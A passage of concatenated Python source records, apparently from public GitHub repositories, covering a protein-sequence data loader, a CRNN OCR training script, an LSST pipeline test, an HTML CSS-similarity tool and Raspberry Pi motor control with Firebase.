tokenizer(self):\n \"\"\"Return seq-token based on sequence\"\"\"\n return self.lambda_tokenizer\n\n\nclass CustomBatchSampler(Sampler):\n r\"\"\"Wraps another sampler to yield a mini-batch of indices.\n\n This custom BatchSampler is inspired from the torch class BatchSampler.\n It takes a list of indexes and shuffle the indexes at each epochs.\n\n Args:\n sampler (List): List of indexes. indexes are a collections of List[int],\n corresponding to the index of the protein sequence.\n batch_size (int): Size of mini-batch. 1 in our case, a batch are already of correct size.\n drop_last (bool): If ``True``, the sampler will drop the last batch if\n its size would be less than ``batch_size``\n \"\"\"\n\n def __init__(self, sampler, batch_size, drop_last):\n if (\n not (type(batch_size) == int)\n or isinstance(batch_size, bool)\n or batch_size <= 0\n ):\n raise ValueError(\n \"batch_size should be a positive integer value, \"\n \"but got batch_size={}\".format(batch_size)\n )\n if not isinstance(drop_last, bool):\n raise ValueError(\n \"drop_last should be a boolean value, but got \"\n \"drop_last={}\".format(drop_last)\n )\n self.sampler = sampler\n self.batch_size = batch_size\n self.drop_last = drop_last\n\n def __iter__(self):\n batch = []\n np.random.shuffle(self.sampler)\n for idx in self.sampler:\n batch.append(idx)\n if len(batch) == self.batch_size:\n yield batch\n batch = []\n if len(batch) > 0 and not self.drop_last:\n yield batch\n\n def __len__(self):\n if self.drop_last:\n return len(self.sampler) // self.batch_size\n else:\n return (len(self.sampler) + self.batch_size - 1) // self.batch_size\n\n\nclass BatchDataset(Dataset):\n def __init__(self, sequences: List[str]) -> None:\n super().__init__()\n self.sequences = np.array(sequences)\n\n def __len__(self):\n return len(self.sequences)\n\n def __getitem__(self, index):\n return self.sequences[index].tolist()\n\n\ndef convert_ckpt_to_statedict(checkpoint_state_dict: OrderedDict) -> OrderedDict:\n \"\"\"This function convert a state_dict coming form pytorch lightning checkpoint to\n a state_dict model that can be load directly in the bio-transformers model.\n\n The keys are updated so that it m.jionatches those in the bio-transformers\n\n Args:\n checkpoint_state_dict: a state_dict loaded from a checkpoint\n \"\"\"\n new_state_dict = OrderedDict()\n for k, v in checkpoint_state_dict.items():\n new_k = \".\".join(k.split(\".\")[1:]) # remove model. prefix in key\n new_state_dict[new_k] = v.to(\"cpu\") # move tensor to cpu\n\n return new_state_dict\n\n\ndef worker_init_fn(worker_id: int):\n \"\"\"Set numpy random seed for each worker.\n\n https://github.com/pytorch/pytorch/issues/5059#issuecomment-404232359\n\n Args:\n worker_id: unique id for each worker\n \"\"\"\n np.random.seed(np.random.get_state()[1][0] + worker_id)\n\n\ndef mask_seq(\n seq: str,\n tokens: torch.Tensor,\n prepend_bos: bool,\n mask_idx: int,\n pad_idx: int,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n random_token_indices: List[int],\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Mask one sequence randomly.\n\n Args:\n seq: string of the sequence.\n tokens: tokens corresponding to the sequence, length can be longer than the seq.\n prepend_bos: if tokenizer adds token\n mask_idx: index of the mask token\n pad_idx: index of the padding token\n masking_ratio: ratio of tokens to be masked.\n masking_prob: probability that the chose token is replaced with a mask token.\n random_token_prob: probability that the chose token is replaced with a random token.\n random_token_indices: list of token indices that random replacement selects from.\n\n Returns:\n tokens: masked tokens\n targets: same length as tokens\n \"\"\"\n # init\n seq_len = len(seq)\n mask_num = int(np.ceil(seq_len * masking_ratio))\n targets = tokens.detach().clone()\n # sample indices\n mask_indices = sorted(\n np.random.choice(seq_len, mask_num, replace=False) + int(prepend_bos)\n )\n # mask tokens\n for idx in mask_indices:\n rand = np.random.random()\n\n # replace with mask\n if rand < masking_prob:\n tokens[idx] = mask_idx\n\n # replace with random token\n elif rand < masking_prob + random_token_prob:\n tokens[idx] = np.random.choice(random_token_indices, 1)[0]\n\n # generate targets\n non_mask_indices = [i for i in range(seq_len) if i not in mask_indices]\n targets[non_mask_indices] = pad_idx\n\n return tokens, targets\n\n\ndef collate_fn(\n samples: Sequence[Tuple[str, str]],\n tokenizer: BatchConverter,\n alphabet: AlphabetDataLoader,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Collate function to mask tokens.\n\n Args:\n samples: a sequences of (label, seq).\n tokenizer: facebook tokenizer, that accepts sequences of (label, seq_str)\n and outputs (labels, seq_strs, tokens).\n alphabet: facebook alphabet.\n masking_ratio: ratio of tokens to be masked.\n masking_prob: probability that the chose token is replaced with a mask token.\n random_token_prob: probability that the chose token is replaced with a random token.\n\n Returns:\n tokens: model input\n targets: model target\n mask_indices: indices of masked tokens\n \"\"\"\n random_token_indices = [alphabet.tok_to_idx(aa) for aa in alphabet.standard_toks]\n seqs, tokens = tokenizer(\n samples[0]\n ) # take samples[0] because batch_sampler return list of list\n tokens_list, targets_list = [], []\n for i, seq in enumerate(seqs):\n tokens_i, targets_i = mask_seq(\n seq=seq,\n tokens=tokens[i, :],\n prepend_bos=alphabet.prepend_bos,\n mask_idx=alphabet.mask_idx,\n pad_idx=alphabet.padding_idx,\n masking_ratio=masking_ratio,\n masking_prob=masking_prob,\n random_token_prob=random_token_prob,\n random_token_indices=random_token_indices,\n )\n tokens_list.append(tokens_i)\n targets_list.append(targets_i)\n\n tokens = torch.stack(tokens_list)\n targets = torch.stack(targets_list)\n\n return tokens, targets\n\n\ndef _filter_sequence(\n sequences_list: List[str], model: str, filter_len: int\n) -> List[str]:\n \"\"\"Function that filter the length of a sequence list\n\n Filtering depends on the type of model. It is automatically enforce as ESM1b\n does'nt manage sequence longer that 1024.\n\n Args:\n sequences_list : list of sequences\n model : name of the model\n length : length limit to consider\n Raises:\n ValueError is model filter_len < 0\n \"\"\"\n\n if model == \"esm1b_t33_650M_UR50S\":\n filter_len = min(filter_len, 1024) if filter_len is not None else 1024\n return [seq for seq in sequences_list if len(seq) < filter_len]\n\n if filter_len is not None:\n if filter_len <= 0:\n raise ValueError(\"filter_len argument should be > 0\")\n return [seq for seq in sequences_list if len(seq) < filter_len]\n\n return sequences_list\n\n\ndef get_batch_indices(\n sequence_strs,\n toks_per_batch: int,\n extra_toks_per_seq: int = 0,\n) -> List[List[int]]:\n \"\"\"Get the batch idx based on the number of tokens in sequences\n\n It computes a list of list of int which are the list of the indexes to consider\n to build a batch.\n Example:\n returning [[1,3,8],[4,7,10],[11],[12]] means that the first batch will be\n composed of sequence at index 1,3,8 for the first batch, sequence 11 for the\n third batch. The idea is to consider a maximum number of tokens per batch.\n\n Args:\n sequence_strs: list of string\n filter_len :\n toks_per_batch (int): Maxi number of token per batch\n extra_toks_per_seq (int, optional): . Defaults to 0.\n\n Returns:\n List: List of batches indexes\n \"\"\"\n buffer_type = List[int]\n sizes = [(len(s), i) for i, s in enumerate(sequence_strs)]\n sizes.sort()\n batches: List[buffer_type] = []\n buffer: buffer_type = []\n max_len = 0\n\n def _flush_current_buf():\n nonlocal max_len, buffer\n if len(buffer) == 0:\n return\n batches.append(buffer)\n buffer = []\n max_len = 0\n\n for sz, i in sizes:\n sz += extra_toks_per_seq\n if max(sz, max_len) * (len(buffer) + 1) > toks_per_batch:\n _flush_current_buf()\n max_len = max(max_len, sz)\n buffer.append(i)\n\n _flush_current_buf()\n return batches\n\n\ndef create_dataloader(\n sequences: List[str],\n alphabet: AlphabetDataLoader,\n filter_len: int,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n num_workers: int = 0,\n toks_per_batch: int = 128,\n extra_toks_per_seq: int = 2,\n) -> DataLoader:\n \"\"\"Create the PyTorch Dataset.\n\n Args:\n filenames: list of sequences\n alphabet: facebook alphabet.\n filter_len: whether filter data wrt len.batch_seq\n num_workers: num of parallel data samplers\n masking_ratio: ratio of tokens to be masked.\n masking_prob: probability that the chose token is replaced with a mask token.\n random_token_prob: probability that the chose token is replaced with a random token.\n\n Returns:\n torch DataLoader\n \"\"\"\n sequences = _filter_sequence(sequences, alphabet.model_dir, filter_len)\n\n batches = get_batch_indices(\n sequences, toks_per_batch=toks_per_batch, extra_toks_per_seq=extra_toks_per_seq\n )\n\n dataset = BatchDataset(sequences)\n b_sampler = CustomBatchSampler(batches, batch_size=1, drop_last=False)\n\n loader = DataLoader(\n dataset,\n num_workers=num_workers,\n collate_fn=functools.partial(\n collate_fn,\n tokenizer=alphabet.tokenizer(),\n alphabet=alphabet,\n masking_ratio=masking_ratio,\n masking_prob=masking_prob,\n random_token_prob=random_token_prob,\n ),\n pin_memory=True,\n worker_init_fn=worker_init_fn,\n batch_sampler=b_sampler,\n sampler=None,\n )\n return loader\n\n\nclass BioDataModule(pl.LightningDataModule):\n def __init__(\n self,\n train_sequences: List[str],\n alphabet: AlphabetDataLoader,\n filter_len: int,\n masking_ratio: float,\n masking_prob: float,\n random_token_prob: float,\n toks_per_batch: int = 128,\n extra_toks_per_seq: int = 2,\n num_workers: int = 0,\n validation: bool = True,\n ):\n super().__init__()\n self.train_sequences = train_sequences\n self.alphabet = alphabet\n self.filter_len = filter_len\n self.masking_ratio = masking_ratio\n self.masking_prob = masking_prob\n self.random_token_prob = random_token_prob\n self.toks_per_batch = toks_per_batch\n self.extra_toks_per_seq = extra_toks_per_seq\n self.num_workers = num_workers\n self.validation = validation\n\n def prepare_data(self):\n pass\n\n def setup(self, stage: Optional[str] = None):\n\n # Assign train/val datasets for use in dataloaders\n if stage == \"fit\" or stage is None:\n if self.validation:\n self.seq_train, self.seq_val = train_test_split(\n self.train_sequences, test_size=0.2\n )\n else:\n self.seq_train = self.train_sequences\n\n # Optionally...\n # self.dims = tuple(self.mnist_train[0][0].shape)\n\n # Assign test dataset for use in dataloader(s)\n # if stage == \"test\" or stage is None:\n # self.mnist_test = MNIST(self.data_dir, train=False, transform=self.transform)\n\n def train_dataloader(self):\n return create_dataloader(\n sequences=self.seq_train,\n alphabet=self.alphabet,\n filter_len=self.filter_len,\n num_workers=self.num_workers,\n masking_ratio=self.masking_ratio,\n masking_prob=self.masking_prob,\n random_token_prob=self.random_token_prob,\n toks_per_batch=self.toks_per_batch,\n extra_toks_per_seq=self.extra_toks_per_seq,\n )\n\n def val_dataloader(self):\n if self.validation:\n return create_dataloader(\n sequences=self.seq_val,\n alphabet=self.alphabet,\n filter_len=self.filter_len,\n num_workers=self.num_workers,\n masking_ratio=self.masking_ratio,\n masking_prob=self.masking_prob,\n random_token_prob=self.random_token_prob,\n toks_per_batch=self.toks_per_batch,\n extra_toks_per_seq=self.extra_toks_per_seq,\n )\n else:\n pass\n\n def test_dataloader(self):\n pass\n","repo_name":"wushixian/bio-transformers","sub_path":"biotransformers/lightning_utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"36847992320","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''=================================================\n@File :trainning.py\n@IDE :PyCharm\n@Author :gpwang\n@Date :2021/10/6\n@Desc : 训练的主代码\n=================================================='''\nimport torch\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.autograd import Variable\nfrom torch.nn import CTCLoss\nimport os\nimport utils\nfrom data import dataset\nimport models.crnn as net\nimport config\nfrom pathlib import Path\n\nexpr_dir = Path(config.expr_dir)\nif not expr_dir.exists(): # 如果不存在该文件夹就创建\n expr_dir.mkdir(parents=True)\n# ------------------------------------------------\n\"\"\"\n加载训练数据和验证数据集\n\"\"\"\n\n\ndef data_loader():\n train_dataset = dataset.CRNNDataset(root=config.TRAIN_ROOT, transform=config.transformations)\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=config.batchSize,\n shuffle=True, num_workers=int(config.workers))\n val_dataset = dataset.CRNNDataset(root=config.VAL_ROOT,\n transform=dataset.ResizeNormalize(\n (config.imgW, config.imgH))) # 验证集一定要进行transfrom处理\n val_loader = torch.utils.data.DataLoader(val_dataset, shuffle=True, batch_size=config.batchSize,\n num_workers=int(config.workers))\n\n return train_loader, val_loader\n\n\n\"\"\"\n1 网络初始化\n2 权重初始化\n3 是否加载预训练权重\n\"\"\"\n\n\ndef weights_init(m):\n \"\"\"\n 权重初始化\n :param m:\n :return:\n \"\"\"\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\n\"\"\"\n网络的初始化\n\"\"\"\n\n\ndef net_init():\n nclass = len(config.alphabet) + 1 # 一定要加一个空格\n crnn = net.CRNN(config.imgH, config.nc, nclass, config.nh)\n crnn.apply(weights_init)\n if config.pretrained != '': # 预训练从中断训练\n print('loading pertrained model from %s' % config.pretrained)\n if config.multi_gpu:\n crnn = torch.nn.DataParallel(crnn)\n crnn.load_state_dict(torch.load(config.pretrained))\n return crnn\n\n\n# ------------------------------验证集验证结果--------\ndef val(crnn, criterion, val_loader, device, converter):\n print('Start val')\n crnn.eval()\n n_correct = 0\n loss_avg = utils.averager() # The blobal loss_avg is used by train\n for i, data in enumerate(val_loader):\n cpu_images, cpu_texts = data\n batch_size = cpu_images.size(0)\n image = cpu_images.to(device)\n text, length = converter.encode(cpu_texts)\n text = text.to(device)\n length = length.to(device)\n with torch.no_grad():\n preds = crnn(image)\n preds_size = Variable(torch.LongTensor([preds.size(0)] * batch_size))\n cost = criterion(preds, text, preds_size, length) / batch_size\n loss_avg.add(cost)\n\n _, preds = preds.max(2)\n preds = preds.transpose(1, 0).contiguous().view(-1)\n sim_preds = converter.decode(preds.data, preds_size.data, raw=False)\n cpu_texts_decode = cpu_texts\n for pred, target in zip(sim_preds, cpu_texts_decode):\n if pred == target:\n n_correct += 1\n\n raw_preds = converter.decode(preds.data, preds_size.data, raw=True)[:config.n_val_disp]\n for raw_pred, pred, gt in zip(raw_preds, sim_preds, cpu_texts_decode):\n print('%-20s => %-20s, gt: %-20s' % (raw_pred, pred, gt))\n\n accuracy = n_correct / len(val_loader.dataset) # float(len(val_loader) * params.batchSize)\n print('Val loss: %f, accuray: %f' % (loss_avg.val(), accuracy))\n return accuracy\n\n\n# ---------------------------------训练的主代码--------\ndef train_batch(crnn, criterion, optimizer, data, device, convert):\n crnn.train()\n cpu_images, cpu_texts = data\n cpu_images = cpu_images.to(device)\n batch_size = cpu_images.size(0)\n text, length = convert.encode(cpu_texts)\n text = text.to(device)\n length = length.to(device)\n image = cpu_images\n optimizer.zero_grad()\n preds = crnn(image)\n preds_size = torch.LongTensor([preds.size(0)] * batch_size)\n cost = criterion(preds, text, preds_size, length) / batch_size\n cost.backward()\n optimizer.step()\n return cost\n\n\n# -----------------------训练主代码主入口-------------\ndef train():\n train_loader, val_loader = data_loader() # 加载训练集和验证集\n crnn = net_init()\n print(crnn)\n converter = utils.strLabelConverter(config.alphabet) # 加载label解码\n if config.adam:\n optimizer = optim.Adam(crnn.parameters(), lr=config.lr, betas=(config.beta1, 0.999))\n elif config.adadelta:\n optimizer = optim.Adadelta(crnn.parameters())\n else:\n optimizer = optim.RMSprop(crnn.parameters(), lr=config.lr)\n\n criterion = CTCLoss(zero_infinity=True)\n crnn = crnn.to(config.device)\n acc = 0\n curAcc = 0\n for epoch in range(config.nepoch):\n n = len(train_loader)\n interval = n // 2 # 评估模型\n pbar = utils.Progbar(target=n)\n loss = 0\n for i, data in enumerate(train_loader):\n cost = train_batch(crnn, criterion, optimizer, data, config.device, converter)\n loss += cost.data.cpu().numpy()\n if (i + 1) % interval == 0:\n curAcc = val(crnn, criterion, val_loader, config.device, converter)\n if curAcc > acc:\n checkpoint = {\n 'model': crnn.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': i + 1\n }\n acc = curAcc\n torch.save(checkpoint, f'{expr_dir}/bestAcc.pth')\n torch.save(crnn.state_dict(), 'crnn.pth') # 只保存模型的结构\n pbar.update(i + 1, values=[('loss', loss / ((i + 1) * config.batchSize)), ('acc', curAcc)])\n print(loss / ((i + 1) * config.batchSize))\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"iwanggp/crnn-pytorch","sub_path":"new_version/trainning.py","file_name":"trainning.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32087311082","text":"from itertools import izip\nimport os, os.path\nimport pdb\nimport sys\nimport time\nimport unittest\n\nfrom lsst.daf.base import cout, Citizen, DateTime, PropertySet\nfrom lsst.pex.policy import Policy\nfrom lsst.daf.persistence import DbAuth, DbStorage, LogicalLocation\nfrom lsst.pex.harness.Clipboard import Clipboard\nfrom lsst.pex.harness.Queue import Queue\nfrom lsst.pex.harness.IOStage import InputStage, OutputStage\n\nimport lsst.pex.logging as log\nimport lsst.ap.pipeline as ap\n\n\nclass PipelineTestCase(unittest.TestCase):\n \"\"\"\n Runs a single visit through the association pipeline. Assumes the existence\n of a test_ap database that contains copies of the necessary input data\n \"\"\"\n def setUp(self):\n # Turn on tracing\n log.Trace.setVerbosity('', 10)\n log.ScreenLog.createDefaultLog(True, log.Log.INFO)\n\n # Eventually, these should be read from a policy somewhere\n self.dbServer = 'lsst10.ncsa.uiuc.edu'\n self.dbPort = '3306'\n self.dbType = 'mysql'\n if not DbAuth.available(self.dbServer, self.dbPort):\n self.fail(\"Cannot access database server %s:%s\" % (self.dbServer, self.dbPort))\n # Construct test run database name\n self.runId = DbAuth.username(self.dbServer, self.dbPort) +\\\n time.strftime(\"_test_ap_%y%m%d_%H%M%S\", time.gmtime())\n\n # Tweak these to run on different input data, or with a different number of slices\n self.universeSize = 2\n self.visitId = 708125\n self.filter = 'u'\n self.ra = 333.880166667\n self.dec = -17.7374166667\n\n self.dbUrlPrefix = ''.join([self.dbType, '://', self.dbServer, ':', self.dbPort, '/'])\n self.dbUrl = self.dbUrlPrefix + self.runId\n self.substitutions = { 'visitId': self.visitId,\n 'filter': self.filter,\n 'runId': self.runId }\n # Create a database specifically for the test (copy relevant\n # tables from the test_ap database)\n mysqlStatements = [\n \"\"\"CREATE DATABASE %(runId)s\"\"\",\n \"\"\"USE %(runId)s\"\"\",\n \"\"\"CREATE TABLE VarObject LIKE test_ap.Object\"\"\",\n \"\"\"CREATE TABLE NonVarObject LIKE test_ap.Object\"\"\",\n \"\"\"CREATE TABLE DIASource LIKE test_ap.DIASource\"\"\",\n \"\"\"CREATE TABLE prv_Filter LIKE test_ap.prv_Filter\"\"\",\n \"\"\"INSERT INTO prv_Filter SELECT * FROM test_ap.prv_Filter\"\"\",\n \"\"\"CREATE TABLE _tmp_v%(visitId)d_DIASource\n LIKE test_ap._tmp_v%(visitId)d_DIASource\"\"\",\n \"\"\"INSERT INTO _tmp_v%(visitId)d_DIASource\n SELECT * FROM test_ap._tmp_v%(visitId)d_DIASource\"\"\",\n \"\"\"CREATE TABLE _tmp_v%(visitId)d_Preds\n LIKE test_ap._tmp_v%(visitId)d_Preds\"\"\",\n \"\"\"INSERT INTO _tmp_v%(visitId)d_Preds\n SELECT * FROM test_ap._tmp_v%(visitId)d_Preds\"\"\",\n \"\"\"CREATE TABLE _tmpl_MatchPair LIKE test_ap._tmpl_MatchPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_IdPair LIKE test_ap._tmpl_IdPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryObject LIKE test_ap._tmpl_InMemoryObject\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryMatchPair LIKE test_ap._tmpl_InMemoryMatchPair\"\"\",\n \"\"\"CREATE TABLE _tmpl_InMemoryId LIKE test_ap._tmpl_InMemoryId\"\"\",\n \"\"\"CREATE TABLE _ap_DIASourceToObjectMatches LIKE test_ap._ap_DIASourceToObjectMatches\"\"\",\n \"\"\"CREATE TABLE _ap_PredToDIASourceMatches LIKE test_ap._ap_PredToDIASourceMatches\"\"\",\n \"\"\"CREATE TABLE _ap_DIASourceToNewObject LIKE test_ap._ap_DIASourceToNewObject\"\"\",\n \"\"\"CREATE TABLE _mops_Prediction LIKE test_ap._mops_Prediction\"\"\"\n ]\n db = DbStorage()\n db.setPersistLocation(LogicalLocation(self.dbUrlPrefix + 'test_ap'))\n try:\n for stmt in mysqlStatements:\n db.executeSql(stmt % self.substitutions)\n \n # Specify list of stages ...\n self.stages = [ ap.LoadStage,\n InputStage,\n ap.MatchDiaSourcesStage,\n OutputStage,\n InputStage,\n ap.MatchMopsPredsStage,\n OutputStage,\n ap.StoreStage ]\n\n # and read in stage policy for each stage\n policyDir = os.path.join(os.environ['AP_DIR'], 'pipeline', 'examples', 'policy')\n self.policies = [ Policy(os.path.join(policyDir,'LoadStage.paf')),\n Policy(os.path.join(policyDir,'MatchDiaSourcesStageInput.paf')),\n None,\n Policy(os.path.join(policyDir,'MatchDiaSourcesStageOutput.paf')),\n Policy(os.path.join(policyDir,'MatchMopsPredsStageInput.paf')),\n None,\n Policy(os.path.join(policyDir,'MatchMopsPredsStageOutput.paf')),\n Policy(os.path.join(policyDir,'StoreStage.paf')) ]\n\n # construct PropertySet for string interpolation\n psSubs = PropertySet()\n psSubs.setInt('visitId', self.visitId)\n psSubs.setString('runId', self.runId)\n psSubs.setString('filter', self.filter)\n psSubs.setString('work', '.')\n psSubs.setString('input', '/tmp')\n psSubs.setString('output', '/tmp')\n psSubs.setString('update', '/tmp')\n psSubs.setString('dbUrl', self.dbUrl)\n LogicalLocation.setLocationMap(psSubs)\n except:\n # cleanup database in case of error\n db.executeSql(\"DROP DATABASE %(runId)s\" % self.substitutions)\n raise\n\n def testOneVisit(self):\n # Create a list of clipboards, stage lists, and queue lists for each slice\n clipboards = [Clipboard() for i in xrange(self.universeSize)]\n stageLists = [[] for i in xrange(self.universeSize)]\n queueLists = []\n for i in xrange(self.universeSize):\n queueList = [Queue() for j in xrange(len(self.stages) + 1)]\n queueList[0].addDataset(clipboards[i])\n queueLists.append(queueList)\n\n # Create and initialize stages for each slice\n for stageClass, policy, i in izip(self.stages, self.policies, xrange(len(self.stages))):\n for stageList, queueList, rank in izip(stageLists, queueLists, xrange(self.universeSize)):\n stage = stageClass(i, policy)\n stage.setRun(self.runId)\n stage.setUniverseSize(self.universeSize)\n stage.setRank(rank - 1)\n stage.initialize(queueList[i+1], queueList[i])\n stageList.append(stage)\n\n # Create the association pipeline trigger event\n dateObs = DateTime.now().mjd(DateTime.TAI)\n triggerAssociationEvent = PropertySet()\n triggerAssociationEvent.setInt('visitId', self.visitId)\n triggerAssociationEvent.setDouble('dateObs', dateObs)\n triggerAssociationEvent.setString('filter', self.filter)\n triggerAssociationEvent.setDouble('ra', self.ra)\n triggerAssociationEvent.setDouble('decl', self.dec)\n\n # Create the event triggering the match against moving object predictions\n triggerMatchMopsPredsEvent = PropertySet()\n triggerMatchMopsPredsEvent.setInt('visitId', self.visitId)\n\n # Add the events to clipboard of each stage\n for clip in clipboards:\n clip.put('triggerAssociationEvent', triggerAssociationEvent)\n clip.put('triggerMatchMopsPredsEvent', triggerMatchMopsPredsEvent)\n\n assert self.universeSize > 1\n masterStageList = stageLists.pop(0)\n\n # Run the pipeline (worker slices are run one after the other)\n for masterStage, workerStages in izip(masterStageList, izip(*stageLists)):\n masterStage.preprocess()\n map(lambda x: x.process(), workerStages)\n masterStage.postprocess()\n\n # Close log to avoid bogus memory-leak reports\n log.Log.closeDefaultLog()\n\n def tearDown(self):\n \"\"\"Clean up after test case runs\"\"\"\n db = DbStorage()\n db.setPersistLocation(LogicalLocation(self.dbUrlPrefix + 'test_ap'))\n #db.executeSql(\"DROP DATABASE %(runId)s\" % self.substitutions)\n del self.policies\n del self.stages\n\n\nclass MemoryTestCase(unittest.TestCase):\n \"\"\"Check for memory leaks of citizens\"\"\"\n def testLeak(self):\n nleak = Citizen.census(0, 0)\n if nleak != 0:\n Citizen.census(cout, 0)\n self.fail(\"Leaked %d blocks\" % nleak)\n\n\ndef suite():\n \"\"\"Returns a suite containing all the test cases in this module.\"\"\"\n suites = [ unittest.makeSuite(PipelineTestCase),\n unittest.makeSuite(MemoryTestCase) ]\n return unittest.TestSuite(suites)\n\ndef run(exit=False):\n \"\"\"Run the tests\"\"\"\n status = 0 if unittest.TextTestRunner().run(suite()).wasSuccessful() else 1\n return sys.exit(status) if exit else status\n\nif __name__ == \"__main__\":\n run(True)\n\n","repo_name":"lsst-dm/legacy-ap","sub_path":"tests/NightlyPipelineTest.py","file_name":"NightlyPipelineTest.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"632040950","text":"import sys\nimport argparse\nfrom simscores import ClassJaccarder, extract_classes_ids, jaccard\nimport logging\nimport os\nfrom collections import defaultdict\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.DEBUG)\n\ndef load_all_files(directory):\n logger.debug('load_all_files: {}'.format(directory))\n\n extractions = {}\n walker = os.walk(directory)\n i = 0\n for w in walker:\n for x in w[2]:\n if not x.endswith('.html'):\n continue\n\n else:\n fn = os.path.join(w[0], x)\n\n with open(fn) as f:\n src = f.read()\n soup = BeautifulSoup(src)\n extractions[x] = extract_classes_ids(soup)\n\n if i % 100 == 0:\n logger.debug('{}: {}'.format(i, fn))\n\n i += 1\n\n return extractions\n\ndef compare_all(extractions):\n keys = extractions.keys()\n results = open('simscores.csv', 'w')\n for i in range(len(keys)):\n for j in range(i+1, len(keys)):\n fn_i = keys[i]\n fn_j = keys[j]\n\n classes_i, ids_i = extractions[fn_i]\n classes_j, ids_j = extractions[fn_j]\n\n j_c = jaccard(classes_i, classes_j)\n j_i = jaccard(ids_i, ids_j)\n\n results.write('{},{},{},{}\\n'.format(fn_i, fn_j, j_c, j_i))\n\ndef compare_files(args):\n with open(args.files[1]) as f1, open(args.files[1]) as f2:\n src1 = f1.read()\n src2 = f2.read()\n\n cj = ClassJaccarder(src1)\n similarity = cj.compare(src2)\n\n logger.debug(similarity)\n\nparser = argparse.ArgumentParser(prog='Compute Jaccard similarities between\\\nthe CSS classes and ids between two HTML documents')\n\nparser.add_argument('--files', '-f', nargs=2,\n help='Path to 2 files that contains HTML source')\n\nparser.add_argument('--directory', '-d', nargs=1,\n help='Directory to recursively parse for files, and to \\\n compute pairwise similarities between.')\nargs = parser.parse_args()\n\nif args.files:\n compare_files(args)\nelif args.directory:\n extractions = load_all_files(args.directory[0])\n compare_all(extractions)\n","repo_name":"giantoak/north-american-tyrion","sub_path":"compute-css-similarity.py","file_name":"compute-css-similarity.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24704972007","text":"# object oriented MAIN CODE\n\nimport RPi.GPIO as GPIO \nfrom time import sleep\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n# firebase modules\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom google.cloud import firestore\nfrom firebase_admin import firestore\nimport threading\n\n# firebase intialize\ncred = credentials.Certificate(\"serviceAccountKey.json\")\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\n# creating an event for notifing main thread\ncallback_done = threading.Event()\n\n\nleftStatus=False\nrightStatus=False\n\n# capturing changes in the database\n\n\n# def on_snapshot(doc_snap,changes,read_time):\n# print(doc_snap)\n# for doc in doc_snap:\n# docDict = doc.to_dict()\n# print(docDict['leftmotor'])\n# if(docDict['leftmotor']==\"Lmotor\"):\n# print(docDict)\n# leftMotorStatus=docDict['leftMotorStatus']\n# global leftStatus\n# leftStatus=leftMotorStatus\n# elif(docDict['rightMotor']==\"Rmotor\"):\n# RightMotorStatus=docDict['rightMotorStatus']\n# global rightStatus\n# rightStatus=RightMotorStatus\n# callback_done.set()\n\n\n# doc_ref_LeftMotor = db.collection('PropellerMotor').document('LeftMotor')\n# doc_ref_RightMotor = db.collection('PropellerMotor').document('RightMotor')\n\n# # watch the document\n# doc_watch1 = doc_ref_LeftMotor.on_snapshot(on_snapshot)\n# doc_watch2 = doc_ref_RightMotor.on_snapshot(on_snapshot)\n\n# \nclass Motor():\n def __init__(self,Ena,In1,In2):\n self.Ena = Ena\n self.In1= In1\n self.In2 = In2\n\n GPIO.setup(self.Ena,GPIO.OUT)\n GPIO.setup(self.In1,GPIO.OUT)\n GPIO.setup(self.In2,GPIO.OUT)\n self.pwm = GPIO.PWM(self.Ena,100)\n self.pwm.start(0)\n \n\n def moveForwardSpeed(self,x=50,t=0):\n GPIO.output(self.In1,GPIO.LOW)\n GPIO.output(self.In2,GPIO.HIGH)\n self.pwm.ChangeDutyCycle(x)\n sleep(t)\n\n def moveBackward(self,x=50,t=0):\n GPIO.output(self.In1,GPIO.HIGH)\n GPIO.output(self.In2,GPIO.LOW)\n self.pwm.ChangeDutyCycle(x)\n sleep(t)\n","repo_name":"chetryJyoti/sih-pi-codes","sub_path":"mainProgram/guidingArmsManual.py","file_name":"guidingArmsManual.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26127172169","text":"#!/usr/bin/env python3\nfrom string import Template\n\nimport pandas as pd\nimport os, sys, re\nimport tkinter as tk\nfrom tkinter import filedialog, E, W, LEFT\n\nimport json\nimport datetime\nfrom myfunc import ls_name, get_filename, get_file_name_ext , Timer\nimport time\nt = Timer()\n\n\nversion = \"V06_20052029\"\n#version = \"V04_20052023\": support package profile, create script with many template as a sametime, create package profile\n#version = \"V05_20052028\": add merge folder button, de quy merge tat cac cac sub folder\n#version = \"V06_20052029\": beautiful printout in terminal, status, GUI printout, friendly progress update during script runing\n\nhome_path = os.path.dirname(os.path.realpath(__file__))\nprint(home_path)\n\n\nclass Timer1:\n\t'''\n\t#example how to 